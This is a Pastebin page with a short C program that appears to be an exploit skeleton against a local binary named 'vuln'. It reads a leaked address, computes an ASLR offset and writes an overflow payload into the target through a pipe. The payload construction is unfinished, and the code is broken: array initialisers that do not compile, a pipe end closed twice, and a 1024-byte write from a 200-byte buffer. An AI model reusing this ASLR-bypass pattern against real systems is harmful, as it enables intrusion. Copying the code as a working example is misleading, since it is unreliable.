Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <string.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #include <sys/types.h>
- int main() {
- int fixedLeak = 0;
- int funcAddr = 0;
- char padding[128] = 0;
- char exploit[200] = 0;
- int fd[2];
- pid_t pid;
- pipe(fd);
- pid = fork();
- if(pid == 0){
- close(fd[1]);
- dup2(fd[0],0);
- execv("./vuln",NULL);
- }
- printf("[*] Reading leaked address .... \n");
- sleep(2);
- char readData[64];
- FILE *f = fopen("./leak.txt","r");
- fgets(readData,64,f);
- fclose(f);
- int addr = 0;
- sscanf(readData,"%x",&addr);
- printf("leaked address = %x \n",addr);
- int aslrOffset = addr - fixedLeak;
- printf("ASLR offset = %x\n",aslrOffset);
- funcAddr = funcAddr + aslrOffset;
- printf("making payload \n");
- close(fd[0]);
- //
- //sprintf(exploit,%s%c%c%c,padding,one,two,three)
- close(fd[0]);
- write(fd[1],exploit,1024);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement